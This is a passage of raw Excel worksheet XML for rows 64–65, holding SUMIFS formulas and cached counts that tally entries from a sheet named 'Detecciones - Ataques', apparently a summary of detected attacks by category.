        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>0</v>
      </c>
      <c r="AJ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>1</v>
      </c>
      <c r="AR64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>0</v>
      </c>
      <c r="AS64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>0</v>
      </c>
      <c r="AV64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>0</v>
      </c>
      <c r="AY64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>0</v>
      </c>
      <c r="BD64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>566</v>
      </c>
      <c r="BN64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>0</v>
      </c>
      <c r="BO64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>0</v>
      </c>
      <c r="BZ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>0</v>
      </c>
      <c r="CI64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>0</v>
      </c>
      <c r="CQ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>0</v>
      </c>
      <c r="CU64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI64" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ64" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>0</v>
      </c>
      <c r="DK64" s="271"/>
      <c r="DO64" s="279"/>
      <c r="DP64" s="271"/>
      <c r="DQ64" s="271"/>
      <c r="DR64" s="271"/>
      <c r="DS64" s="271"/>
      <c r="DT64" s="271"/>
      <c r="DU64" s="271"/>
      <c r="DV64" s="271"/>
      <c r="DW64" s="271"/>
      <c r="DX64" s="271"/>
      <c r="DY64" s="271"/>
      <c r="DZ64" s="271"/>
      <c r="EA64" s="271"/>
      <c r="EB64" s="271"/>
      <c r="EC64" s="271"/>
      <c r="ED64" s="280"/>
      <c r="EG64" s="279"/>
      <c r="EH64" s="271"/>
      <c r="EI64" s="435" t="s">
        <v>2515</v>
      </c>
      <c r="EJ64" s="437">
        <f t="shared" ref="EJ64:EN64" si="59">SUM(EJ49:EJ62)</f>
        <v>7</v>
      </c>
      <c r="EK64" s="437">
        <f t="shared" si="59"/>
        <v>64</v>
      </c>
      <c r="EL64" s="437">
        <f t="shared" si="59"/>
        <v>98</v>
      </c>
      <c r="EM64" s="437">
        <f t="shared" si="59"/>
        <v>120</v>
      </c>
      <c r="EN64" s="437">
        <f t="shared" si="59"/>
        <v>120</v>
      </c>
      <c r="EO64" s="271"/>
      <c r="EP64" s="271"/>
      <c r="EQ64" s="483"/>
      <c r="ER64" s="478"/>
      <c r="ES64" s="478"/>
      <c r="ET64" s="478"/>
      <c r="EU64" s="478"/>
      <c r="EV64" s="486" t="s">
        <v>2543</v>
      </c>
      <c r="EW64" s="486"/>
      <c r="EX64" s="486"/>
      <c r="EY64" s="487">
        <f>AVERAGE(EW50:EZ63)</f>
        <v>0.2145417266</v>
      </c>
      <c r="EZ64" s="486"/>
      <c r="FA64" s="479"/>
      <c r="FD64" s="480"/>
      <c r="FG64" s="488"/>
      <c r="FH64" s="489" t="s">
        <v>2544</v>
      </c>
      <c r="FI64" s="490" t="s">
        <v>2545</v>
      </c>
      <c r="FM64" s="480"/>
      <c r="FN64" s="480"/>
      <c r="FO64" s="480"/>
      <c r="FP64" s="480"/>
      <c r="FQ64" s="480"/>
      <c r="FR64" s="480"/>
      <c r="FS64" s="480"/>
      <c r="FT64" s="480"/>
      <c r="FU64" s="480"/>
      <c r="FV64" s="480"/>
      <c r="FW64" s="480"/>
      <c r="FX64" s="480"/>
      <c r="FY64" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="FZ64" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="GA64" s="451" t="s">
        <v>2456</v>
      </c>
      <c r="GB64" s="480"/>
      <c r="GC64" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="GD64" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="GE64" s="451" t="s">
        <v>2456</v>
      </c>
      <c r="GF64" s="480"/>
      <c r="GG64" s="480"/>
      <c r="GH64" s="480"/>
      <c r="GI64" s="480"/>
      <c r="GJ64" s="480"/>
      <c r="GK64" s="480"/>
      <c r="GL64" s="480"/>
      <c r="GM64" s="480"/>
      <c r="GN64" s="480"/>
      <c r="GO64" s="480"/>
      <c r="GP64" s="480"/>
      <c r="GQ64" s="480"/>
      <c r="GR64" s="480"/>
      <c r="GS64" s="480"/>
      <c r="GT64" s="480"/>
      <c r="GU64" s="480"/>
      <c r="GV64" s="480"/>
      <c r="GW64" s="480"/>
      <c r="GX64" s="480"/>
      <c r="GY64" s="480"/>
      <c r="GZ64" s="480"/>
      <c r="HA64" s="480"/>
      <c r="HB64" s="480"/>
      <c r="HC64" s="480"/>
      <c r="HD64" s="480"/>
      <c r="HE64" s="480"/>
      <c r="HF64" s="480"/>
      <c r="HG64" s="480"/>
      <c r="HH64" s="480"/>
      <c r="HI64" s="480"/>
      <c r="HJ64" s="480"/>
      <c r="HK64" s="480"/>
      <c r="HL64" s="480"/>
      <c r="HM64" s="480"/>
      <c r="HN64" s="480"/>
      <c r="HO64" s="480"/>
      <c r="HP64" s="480"/>
    </row>
    <row r="65">
      <c r="J65" s="277"/>
      <c r="K65" s="481"/>
      <c r="L65" s="482"/>
      <c r="M65" s="482"/>
      <c r="N65" s="473"/>
      <c r="O65" s="278"/>
      <c r="Q65" s="271"/>
      <c r="R65" s="352" t="s">
        <v>2532</v>
      </c>
      <c r="S65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="T65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>108</v>
      </c>
      <c r="V65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="W65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Y65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Z65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>569</v>
      </c>
      <c r="AA65" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CV3:$CV139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AB65" s="353">
